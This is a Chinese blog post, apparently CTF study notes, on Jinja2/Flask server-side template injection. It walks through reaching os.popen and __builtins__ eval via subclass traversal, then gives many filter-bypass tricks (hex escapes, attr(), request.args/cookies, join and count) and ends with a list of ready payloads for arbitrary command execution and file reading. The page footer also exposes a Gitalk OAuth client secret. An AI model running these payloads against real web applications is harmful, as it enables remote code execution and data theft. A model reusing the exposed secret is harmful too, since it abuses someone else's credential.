<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">(()|select|string)[<span class="number">24</span>]~</span><br><span class="line">(()|select|string)[<span class="number">24</span>]~</span><br><span class="line">(()|select|string)[<span class="number">15</span>]~</span><br><span class="line">(()|select|string)[<span class="number">20</span>]~</span><br><span class="line">(()|select|string)[<span class="number">6</span>]~</span><br><span class="line">(()|select|string)[<span class="number">18</span>]~</span><br><span class="line">(()|select|string)[<span class="number">18</span>]~</span><br><span class="line">(()|select|string)[<span class="number">24</span>]~</span><br><span class="line">(()|select|string)[<span class="number">24</span>]</span><br><span class="line"></span><br><span class="line">得到字符串<span class="string">&quot;__class__&quot;</span></span><br></pre></td></tr></table></figure>

<h2 id="list"><a href="#list" class="headerlink" title="list"></a>list</h2><p>转换成列表</p>
<p>更多的用途是配合上面的string转换成列表，就可以调用列表里面的方法取字符了</p>
<p>其实更多的是可以用list的函数了</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&gt;&gt;&gt;()|select|string|<span class="built_in">list</span></span><br><span class="line">[<span class="string">&#x27;&lt;&#x27;</span>, <span class="string">&#x27;g&#x27;</span>, <span class="string">&#x27;e&#x27;</span>, <span class="string">&#x27;n&#x27;</span>, <span class="string">&#x27;e&#x27;</span>, <span class="string">&#x27;r&#x27;</span>, <span class="string">&#x27;a&#x27;</span>, <span class="string">&#x27;t&#x27;</span>, <span class="string">&#x27;o&#x27;</span>, <span class="string">&#x27;r&#x27;</span>, <span class="string">&#x27; &#x27;</span>, <span class="string">&#x27;o&#x27;</span>, <span class="string">&#x27;b&#x27;</span>, <span class="string">&#x27;j&#x27;</span>, <span class="string">&#x27;e&#x27;</span>, <span class="string">&#x27;c&#x27;</span>, <span class="string">&#x27;t&#x27;</span>, <span class="string">&#x27; &#x27;</span>, <span class="string">&#x27;s&#x27;</span>, <span class="string">&#x27;e&#x27;</span>, <span class="string">&#x27;l&#x27;</span>, <span class="string">&#x27;e&#x27;</span>, <span class="string">&#x27;c&#x27;</span>, <span class="string">&#x27;t&#x27;</span>, <span class="string">&#x27;_&#x27;</span>, <span class="string">&#x27;o&#x27;</span>, <span class="string">&#x27;r&#x27;</span>, <span class="string">&#x27;_&#x27;</span>, <span class="string">&#x27;r&#x27;</span>, <span class="string">&#x27;e&#x27;</span>, <span class="string">&#x27;j&#x27;</span>, <span class="string">&#x27;e&#x27;</span>, <span class="string">&#x27;c&#x27;</span>, <span class="string">&#x27;t&#x27;</span>, <span class="string">&#x27; &#x27;</span>, <span class="string">&#x27;a&#x27;</span>, <span class="string">&#x27;t&#x27;</span>, <span class="string">&#x27; &#x27;</span>, <span class="string">&#x27;0&#x27;</span>, <span class="string">&#x27;x&#x27;</span>, <span class="string">&#x27;7&#x27;</span>, <span class="string">&#x27;f&#x27;</span>, <span class="string">&#x27;c&#x27;</span>, <span class="string">&#x27;7&#x27;</span>, <span class="string">&#x27;6&#x27;</span>, <span class="string">&#x27;7&#x27;</span>, <span class="string">&#x27;8&#x27;</span>, <span class="string">&#x27;c&#x27;</span>, <span class="string">&#x27;d&#x27;</span>, <span class="string">&#x27;f&#x27;</span>, <span class="string">&#x27;2&#x27;</span>, <span class="string">&#x27;0&#x27;</span>, <span class="string">&#x27;&gt;&#x27;</span>][<span class="string">&#x27;&lt;&#x27;</span>, <span class="string">&#x27;g&#x27;</span>, <span class="string">&#x27;e&#x27;</span>, <span class="string">&#x27;n&#x27;</span>, <span class="string">&#x27;e&#x27;</span>, <span class="string">&#x27;r&#x27;</span>, <span class="string">&#x27;a&#x27;</span>, <span class="string">&#x27;t&#x27;</span>, <span class="string">&#x27;o&#x27;</span>, <span class="string">&#x27;r&#x27;</span>, <span class="string">&#x27; &#x27;</span>, <span class="string">&#x27;o&#x27;</span>, <span class="string">&#x27;b&#x27;</span>, <span class="string">&#x27;j&#x27;</span>, <span class="string">&#x27;e&#x27;</span>, <span class="string">&#x27;c&#x27;</span>, <span class="string">&#x27;t&#x27;</span>, <span class="string">&#x27; &#x27;</span>, <span class="string">&#x27;s&#x27;</span>, <span class="string">&#x27;e&#x27;</span>, <span class="string">&#x27;l&#x27;</span>, <span class="string">&#x27;e&#x27;</span>, <span class="string">&#x27;c&#x27;</span>, <span class="string">&#x27;t&#x27;</span>, <span class="string">&#x27;_&#x27;</span>, <span class="string">&#x27;o&#x27;</span>, <span class="string">&#x27;r&#x27;</span>, <span class="string">&#x27;_&#x27;</span>, <span class="string">&#x27;r&#x27;</span>, <span class="string">&#x27;e&#x27;</span>, <span class="string">&#x27;j&#x27;</span>, <span class="string">&#x27;e&#x27;</span>, <span class="string">&#x27;c&#x27;</span>, <span class="string">&#x27;t&#x27;</span>, <span class="string">&#x27; &#x27;</span>, <span class="string">&#x27;a&#x27;</span>, <span class="string">&#x27;t&#x27;</span>, <span class="string">&#x27; &#x27;</span>, <span class="string">&#x27;0&#x27;</span>, <span class="string">&#x27;x&#x27;</span>, <span class="string">&#x27;7&#x27;</span>, <span class="string">&#x27;f&#x27;</span>, <span class="string">&#x27;c&#x27;</span>, <span class="string">&#x27;7&#x27;</span>, <span class="string">&#x27;6&#x27;</span>, <span class="string">&#x27;7&#x27;</span>, <span class="string">&#x27;8&#x27;</span>, <span class="string">&#x27;c&#x27;</span>, <span class="string">&#x27;d&#x27;</span>, <span class="string">&#x27;f&#x27;</span>, <span class="string">&#x27;2&#x27;</span>, <span class="string">&#x27;0&#x27;</span>, <span class="string">&#x27;&gt;&#x27;</span>]</span><br><span class="line">&gt;&gt;&gt;(()|select|string|<span class="built_in">list</span>)[<span class="number">1</span>]</span><br><span class="line">g</span><br></pre></td></tr></table></figure>

<h1 id="变量"><a href="#变量" class="headerlink" title="变量"></a>变量</h1><p>除了标准的python语法使用点<code>.</code>外，还可以使用中括号<code>[]</code>来访问变量的属性</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;<span class="string">&quot;&quot;</span>.__class__&#125;&#125;</span><br><span class="line">&#123;&#123;<span class="string">&quot;&quot;</span>[<span class="string">&#x27;__classs__&#x27;</span>]&#125;&#125;</span><br></pre></td></tr></table></figure>

<h2 id="拼接："><a href="#拼接：" class="headerlink" title="拼接："></a>拼接：</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;__cla&quot;+&quot;ss__&quot;`其实不用加中间的加号也可以 直接`&quot;__cla&quot;&quot;ss__&quot;</span><br></pre></td></tr></table></figure>

<h2 id="反转"><a href="#反转" class="headerlink" title="反转"></a>反转</h2><p><code>&quot;__ssalc__&quot;[::-1]</code> 其实是python的切片</p>
<h2 id="ascii转换"><a href="#ascii转换" class="headerlink" title="ascii转换"></a>ascii转换</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&quot;&#123;0:c&#125;&quot;</span>.<span class="built_in">format</span>(<span class="number">97</span>)=<span class="string">&#x27;a&#x27;</span></span><br><span class="line"><span class="string">&quot;&#123;0:c&#125;&#123;1:c&#125;&#123;2:c&#125;&#123;3:c&#125;&#123;4:c&#125;&#123;5:c&#125;&#123;6:c&#125;&#123;7:c&#125;&#123;8:c&#125;&quot;</span>.<span class="built_in">format</span>(<span class="number">95</span>,<span class="number">95</span>,<span class="number">99</span>,<span class="number">108</span>,<span class="number">97</span>,<span class="number">115</span>,<span class="number">115</span>,<span class="number">95</span>,<span class="number">95</span>)=<span class="string">&#x27;__class__&#x27;</span></span><br><span class="line">&gt;&gt;&gt;<span class="string">&quot;&quot;</span>[<span class="string">&quot;&#123;0:c&#125;&#123;1:c&#125;&#123;2:c&#125;&#123;3:c&#125;&#123;4:c&#125;&#123;5:c&#125;&#123;6:c&#125;&#123;7:c&#125;&#123;8:c&#125;&quot;</span>.<span class="built_in">format</span>(<span class="number">95</span>,<span class="number">95</span>,<span class="number">99</span>,<span class="number">108</span>,<span class="number">97</span>,<span class="number">115</span>,<span class="number">115</span>,<span class="number">95</span>,<span class="number">95</span>)]</span><br><span class="line">&lt;<span class="keyword">class</span> <span class="string">&#x27;str&#x27;</span>&gt;</span><br></pre></td></tr></table></figure>

<h2 id="编码绕过"><a href="#编码绕过" class="headerlink" title="编码绕过"></a>编码绕过</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">\x5f\x5fclass\x5f\x5f <span class="comment">#16进制 __class__</span></span><br><span class="line">&gt;&gt;&gt;<span class="string">&quot;&quot;</span>[<span class="string">&quot;\x5f\x5fclass\x5f\x5f&quot;</span>]</span><br><span class="line">&lt;<span class="keyword">class</span> <span class="string">&#x27;str&#x27;</span>&gt;</span><br></pre></td></tr></table></figure>



<h2 id="在jinja2里面可以利用-进行拼接"><a href="#在jinja2里面可以利用-进行拼接" class="headerlink" title="在jinja2里面可以利用~进行拼接"></a>在jinja2里面可以利用~进行拼接</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;%<span class="built_in">set</span> a=<span class="string">&#x27;__cla&#x27;</span> %&#125;&#123;%<span class="built_in">set</span> b=<span class="string">&#x27;ss__&#x27;</span>%&#125;&#123;&#123;<span class="string">&quot;&quot;</span>[a~b]&#125;&#125;</span><br></pre></td></tr></table></figure>

<h1 id="SSTI语句构造"><a href="#SSTI语句构造" class="headerlink" title="SSTI语句构造"></a>SSTI语句构造</h1><h2 id="首先就是要拿到当前类"><a href="#首先就是要拿到当前类" class="headerlink" title="首先就是要拿到当前类"></a>首先就是要拿到当前类</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;<span class="string">&quot;&quot;</span>.__class__&#125;&#125;</span><br><span class="line">或者</span><br><span class="line">&#123;&#123;().<span class="keyword">class</span>&#125;&#125;</span><br></pre></td></tr></table></figure>

<h2 id="拿object"><a href="#拿object" class="headerlink" title="拿object"></a>拿object</h2><p>也就是需要object然后再从它的子类中找我们可以利用的</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;<span class="string">&quot;&quot;</span>.__class__.__mro__[<span class="number">1</span>]&#125;&#125;</span><br><span class="line">&#123;&#123;<span class="string">&quot;&quot;</span>.__class__.__mro__[-<span class="number">1</span>]&#125;&#125;</span><br><span class="line"><span class="string">&quot;&quot;</span>.__class__.__bases__[<span class="number">0</span>]</span><br><span class="line">&#123;&#123;<span class="string">&quot;&quot;</span>.__class__.__base__&#125;&#125;</span><br></pre></td></tr></table></figure>

<h2 id="拿基类的子类"><a href="#拿基类的子类" class="headerlink" title="拿基类的子类"></a>拿基类的子类</h2><p>用<code>__subclasses__()</code>获取子类</p>
<p>大多数利用的是<code>os.wrap_close</code>这个类</p>
<p>然后就是来找我们想要的内容 调教gpt帮我们写一个</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">format_content</span>(<span class="params">content</span>):</span><br><span class="line">    lines = content.split(<span class="string">&quot;,&quot;</span>)  <span class="comment"># 以逗号为分隔符将内容拆分成行</span></span><br><span class="line">    formatted_lines = [<span class="string">f&quot;<span class="subst">&#123;i + <span class="number">1</span>&#125;</span>. <span class="subst">&#123;line.strip()&#125;</span>&quot;</span> <span class="keyword">for</span> i, line <span class="keyword">in</span> <span class="built_in">enumerate</span>(lines)]  <span class="comment"># 为每一行添加序号</span></span><br><span class="line">    formatted_content = <span class="string">&quot;\n&quot;</span>.join(formatted_lines)  <span class="comment"># 将格式化后的行重新组合成字符串</span></span><br><span class="line">    <span class="keyword">return</span> formatted_content</span><br><span class="line"></span><br><span class="line">filename = <span class="string">&quot;content.txt&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(filename, <span class="string">&#x27;r&#x27;</span>) <span class="keyword">as</span> file:</span><br><span class="line">    input_content = file.read()</span><br><span class="line"></span><br><span class="line">formatted_content = format_content(input_content)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;格式化后的内容:&quot;</span>) <span class="comment">#找到的序号需要-1 注意一下</span></span><br><span class="line"><span class="built_in">print</span>(formatted_content)</span><br></pre></td></tr></table></figure>

<p>只要将前后的<code>[]</code>删去 然后放到content.txt就能自动帮我们标上序号了 然后序号要-1 因为脚本是从1开始的</p>
<p><img src="https://z1d10t-blog.oss-cn-shenzhen.aliyuncs.com/img/blog1692349329941-cb5af00f-68ae-4fa1-90cb-496a1cedb40d.png" alt="img"></p>
<h2 id="init-方法进行初始化类"><a href="#init-方法进行初始化类" class="headerlink" title="__init__方法进行初始化类"></a>__init__方法进行初始化类</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&gt;&gt;&gt;&#123;&#123;<span class="string">&quot;&quot;</span>.__class__.__base__.__subclasses__()[<span class="number">132</span>].__init__&#125;&#125;</span><br><span class="line">&lt;function _wrap_close.__init__ at <span class="number">0x7f2ee6fb25e0</span>&gt;</span><br></pre></td></tr></table></figure>

<h2 id="然后再调用-globals-获取到方法内以字典的形式返回的方法、属性"><a href="#然后再调用-globals-获取到方法内以字典的形式返回的方法、属性" class="headerlink" title="然后再调用__globals__获取到方法内以字典的形式返回的方法、属性"></a>然后再调用__globals__获取到方法内以字典的形式返回的方法、属性</h2><p><img src="https://z1d10t-blog.oss-cn-shenzhen.aliyuncs.com/img/blog1692349601730-0a12bdff-7cdb-44f9-a0b4-5db308ab3cc9.png" alt="img"></p>
<p>现在用命令执行函数或者模块就行了</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&gt;&gt;&gt;&#123;&#123;<span class="string">&quot;&quot;</span>.__class__.__base__.__subclasses__()[<span class="number">132</span>].__init__.__globals__[<span class="string">&#x27;popen&#x27;</span>](<span class="string">&#x27;ls /&#x27;</span>).read()&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>有一个很厉害的模块是<strong>buildtins</strong>里面有eval()等函数可以用来rce</p>
<p><img src="https://z1d10t-blog.oss-cn-shenzhen.aliyuncs.com/img/blog1692349815755-69fb51d9-5140-4b90-9be5-72c61c2cd7e0.png" alt="img"></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;<span class="string">&quot;&quot;</span>.__class__.__base__.__subclasses__()[<span class="number">132</span>].__init__.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>][<span class="string">&#x27;eval&#x27;</span>](<span class="string">&quot;__import__(&#x27;os&#x27;).popen(&#x27;cat /flag&#x27;).read()&quot;</span>)&#125;&#125;</span><br></pre></td></tr></table></figure>

<h1 id="SSTI常见的绕过方式"><a href="#SSTI常见的绕过方式" class="headerlink" title="SSTI常见的绕过方式"></a>SSTI常见的绕过方式</h1><h2 id="绕过"><a href="#绕过" class="headerlink" title="绕过."></a>绕过.</h2><ol>
<li>前面也举了很多例子 可以用<code>[]</code>来代替</li>
</ol>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;<span class="string">&quot;&quot;</span>.__class__&#125;&#125;=&#123;&#123;<span class="string">&quot;&quot;</span>[<span class="string">&#x27;__class&#x27;</span>]&#125;&#125;</span><br></pre></td></tr></table></figure>

<ol>
<li>可以用attr()过滤器 </li>
</ol>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;<span class="string">&quot;&quot;</span>.__class__&#125;&#125;=&#123;&#123;<span class="string">&quot;&quot;</span>|attr(<span class="string">&#x27;__class__&#x27;</span>)&#125;&#125;</span><br></pre></td></tr></table></figure>

<h2 id="绕过-1"><a href="#绕过-1" class="headerlink" title="绕过_"></a>绕过_</h2><ol>
<li>通过list获取字符列表，然后用pop来获取_ 其实就是去截_</li>
</ol>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;% <span class="built_in">set</span> a=(()|select|string|<span class="built_in">list</span>).pop(<span class="number">24</span>)%&#125;&#123;%<span class="built_in">print</span>(a)%&#125;</span><br></pre></td></tr></table></figure>

<ol>
<li>通过十六进制编码 </li>
</ol>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;()[<span class="string">&quot;\x5f\x5fclass\x5f\x5f&quot;</span>]&#125;&#125; =&#123;&#123;().__class__&#125;&#125;</span><br></pre></td></tr></table></figure>

<h2 id="绕过-2"><a href="#绕过-2" class="headerlink" title="绕过[]"></a>绕过[]</h2><p>可以使用__getitem__魔术方法 简单说就是把中括号转换为括号</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">__bases__[<span class="number">0</span>]=__bases__.__getitem__(<span class="number">0</span>)</span><br></pre></td></tr></table></figure>

<p>其实本质是我们用[]的时候 调用的就是这个魔术方法而已</p>
<h2 id="绕过花括号"><a href="#绕过花括号" class="headerlink" title="绕过花括号"></a>绕过花括号</h2><p>可以用<code>&#123;%%&#125;`bypass 这时就要在里面用print()来打印结果了

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;<span class="string">&quot;&quot;</span>.__class__.__bases__[<span class="number">0</span>]. __subclasses__()[<span class="number">138</span>].__init__.__globals__[<span class="string">&#x27;popen&#x27;</span>](<span class="string">&#x27;whoami&#x27;</span>).read()&#125;&#125;</span><br><span class="line">修改为</span><br><span class="line">&#123;%<span class="built_in">print</span>(<span class="string">&quot;&quot;</span>.__class__.__bases__[<span class="number">0</span>]. __subclasses__()[<span class="number">138</span>].__init__.__globals__[<span class="string">&#x27;popen&#x27;</span>](<span class="string">&#x27;whoami&#x27;</span>).read())%&#125;</span><br></pre></td></tr></table></figure>

也可以借助for循环和if语句来执行命令

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;%<span class="keyword">for</span> i <span class="keyword">in</span> <span class="string">&#x27;&#x27;</span>.__class__.__base__.__subclasses__()%&#125;&#123;%<span class="keyword">if</span> i.__name__ ==<span class="string">&#x27;_wrap_close&#x27;</span>%&#125;&#123;%<span class="built_in">print</span> i.__init__.__globals__[<span class="string">&#x27;popen&#x27;</span>](<span class="string">&#x27;whoami&#x27;</span>).read()%&#125;&#123;%endif%&#125;&#123;%endfor%&#125;</span><br></pre></td></tr></table></figure>

注意这里循环语句 有`&#123;%for&#125;`就要有`&#123;%endfor%&#125;</code></p>
<p>有<code>&#123;%if&#125;` 就要有`&#123;%endif%&#125;</code></p>
<h2 id="绕过单引号和双引号"><a href="#绕过单引号和双引号" class="headerlink" title="绕过单引号和双引号"></a>绕过单引号和双引号</h2><p>当单引号和双引号被ban时，我们通常采用<code>request.args.a</code>，然后给a赋值这种方式来进行绕过</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;url_for.__globals__[request.args.a]&#125;&#125;&amp;a=__builtins__  等同于 &#123;&#123;url_for.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>]&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>原理</p>
<p><img src="https://z1d10t-blog.oss-cn-shenzhen.aliyuncs.com/img/blog1692353373357-ff1aea78-b318-4a51-b0ae-8ed11fcc5d7b.png" alt="img"></p>
<p>如果args也被禁了</p>
<p>可以采用<code>request.cookies</code>和<code>request.values</code>，他们利用的方式大同小异</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">GET:&#123;&#123;url_for.__globals__[request.cookies.a]&#125;&#125;</span><br><span class="line">COOkie: <span class="string">&quot;a&quot;</span> :<span class="string">&#x27;__builtins__&#x27;</span></span><br></pre></td></tr></table></figure>

<h2 id="绕过数字"><a href="#绕过数字" class="headerlink" title="绕过数字"></a>绕过数字</h2><p>可以通过count来得到数字</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;(<span class="built_in">dict</span>(e=a)|join|count)&#125;&#125; <span class="comment">#1</span></span><br><span class="line">&#123;&#123;(<span class="built_in">dict</span>(eee=a)|join|count)&#125;&#125;<span class="comment">#3</span></span><br></pre></td></tr></table></figure>

<p>在这里join将字典的键连接起来 然后count</p>
<h2 id="绕过关键字"><a href="#绕过关键字" class="headerlink" title="绕过关键字"></a>绕过关键字</h2><p>和上面相同的原理 join拼接</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;<span class="built_in">dict</span>(__<span class="keyword">in</span>=a,it__=a)|join&#125;&#125;  =__init__</span><br></pre></td></tr></table></figure>

<h1 id="常用payload"><a href="#常用payload" class="headerlink" title="常用payload"></a>常用payload</h1><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1</span>、任意命令执行</span><br><span class="line">&#123;%<span class="keyword">for</span> i <span class="keyword">in</span> <span class="string">&#x27;&#x27;</span>.__class__.__base__.__subclasses__()%&#125;&#123;%<span class="keyword">if</span> i.__name__ ==<span class="string">&#x27;_wrap_close&#x27;</span>%&#125;&#123;%<span class="built_in">print</span> i.__init__.__globals__[<span class="string">&#x27;popen&#x27;</span>](<span class="string">&#x27;dir&#x27;</span>).read()%&#125;&#123;%endif%&#125;&#123;%endfor%&#125;</span><br><span class="line"><span class="number">2</span>、任意命令执行</span><br><span class="line">&#123;&#123;<span class="string">&quot;&quot;</span>.__class__.__bases__[<span class="number">0</span>]. __subclasses__()[<span class="number">138</span>].__init__.__globals__[<span class="string">&#x27;popen&#x27;</span>](<span class="string">&#x27;cat /flag&#x27;</span>).read()&#125;&#125;</span><br><span class="line">//这个<span class="number">138</span>对应的类是os._wrap_close，只需要找到这个类的索引就可以利用这个payload</span><br><span class="line"><span class="number">3</span>、任意命令执行</span><br><span class="line">&#123;&#123;url_for.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>][<span class="string">&#x27;eval&#x27;</span>](<span class="string">&quot;__import__(&#x27;os&#x27;).popen(&#x27;dir&#x27;).read()&quot;</span>)&#125;&#125;</span><br><span class="line"><span class="number">4</span>、任意命令执行</span><br><span class="line">&#123;&#123;x.__init__.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>][<span class="string">&#x27;eval&#x27;</span>](<span class="string">&quot;__import__(&#x27;os&#x27;).popen(&#x27;cat flag&#x27;).read()&quot;</span>)&#125;&#125;</span><br><span class="line">//x的含义是可以为任意字母，不仅仅限于x</span><br><span class="line"><span class="number">5</span>、任意命令执行</span><br><span class="line">&#123;&#123;config.__init__.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>][<span class="string">&#x27;eval&#x27;</span>](<span class="string">&quot;__import__(&#x27;os&#x27;).popen(&#x27;cat flag&#x27;).read()&quot;</span>)&#125;&#125;</span><br><span class="line"><span class="number">6</span>、文件读取</span><br><span class="line">&#123;&#123;x.__init__.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>].<span class="built_in">open</span>(<span class="string">&#x27;/flag&#x27;</span>, <span class="string">&#x27;r&#x27;</span>).read()&#125;&#125;</span><br><span class="line">//x的含义是可以为任意字母，不仅仅限于x</span><br></pre></td></tr></table></figure>



<h1 id="后言："><a href="#后言：" class="headerlink" title="后言："></a>后言：</h1><p>做题慢慢补充</p>
<p>参考：<a target="_blank" rel="noopener" href="https://tttang.com/archive/1698/#toc__4">https://tttang.com/archive/1698/#toc__4</a> </p>

    </div>

    
    
    

    <footer class="post-footer">

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/post/ccf2062.html" rel="prev" title="第一次hwの经历">
                  <i class="fa fa-chevron-left"></i> 第一次hwの经历
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/post/7eb33f7a.html" rel="next" title="ctfshow-ssti">
                  ctfshow-ssti <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






    <div class="comments gitalk-container"></div>
</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="beian"><a href="https://beian.miit.gov.cn/" rel="noopener" target="_blank">陇ICP备2023001761号-1 </a>
  </div>

<div class="copyright">
  &copy; 2023.2 – 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Z1d10t</span>
</div>



    </div>
  </footer>

  

  <a href="https://github.com/Z1d10t" class="github-corner" title="Follow me on GitHub" aria-label="Follow me on GitHub" rel="noopener" target="_blank"><svg width="80" height="80" viewBox="0 0 250 250" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"></path></svg></a>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-generator-searchdb/1.4.1/search.js" integrity="sha256-1kfA5uHPf65M5cphT2dvymhkuyHPQp5A53EGZOnOLmc=" crossorigin="anonymous"></script>
<script src="/js/third-party/search/local-search.js"></script>





  




<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/gitalk/1.8.0/gitalk.css" integrity="sha256-AJnUHL7dBv6PGaeyPQJcgQPDjt/Hn/PvYZde1iqfp8U=" crossorigin="anonymous">

<script class="next-config" data-name="gitalk" type="application/json">{"enable":true,"github_id":"Z1d10t","repo":"Z1d10t.github.io","client_id":"c9dd41fa890386350257","client_secret":"c78f6b60a410862c2dcc596f09db2f0c06f025c6","admin_user":"Z1d10t","distraction_free_mode":true,"proxy":"https://cors-anywhere.azm.workers.dev/https://github.com/login/oauth/access_token","js":{"url":"https://cdnjs.cloudflare.com/ajax/libs/gitalk/1.8.0/gitalk.min.js","integrity":"sha256-MVK9MGD/XJaGyIghSVrONSnoXoGh3IFxLw0zfvzpxR4="},"path_md5":"6cf57b905cc4fe686112a706221a57be"}</script>
<script src="/js/third-party/comments/gitalk.js"></script>

</body>
</html>

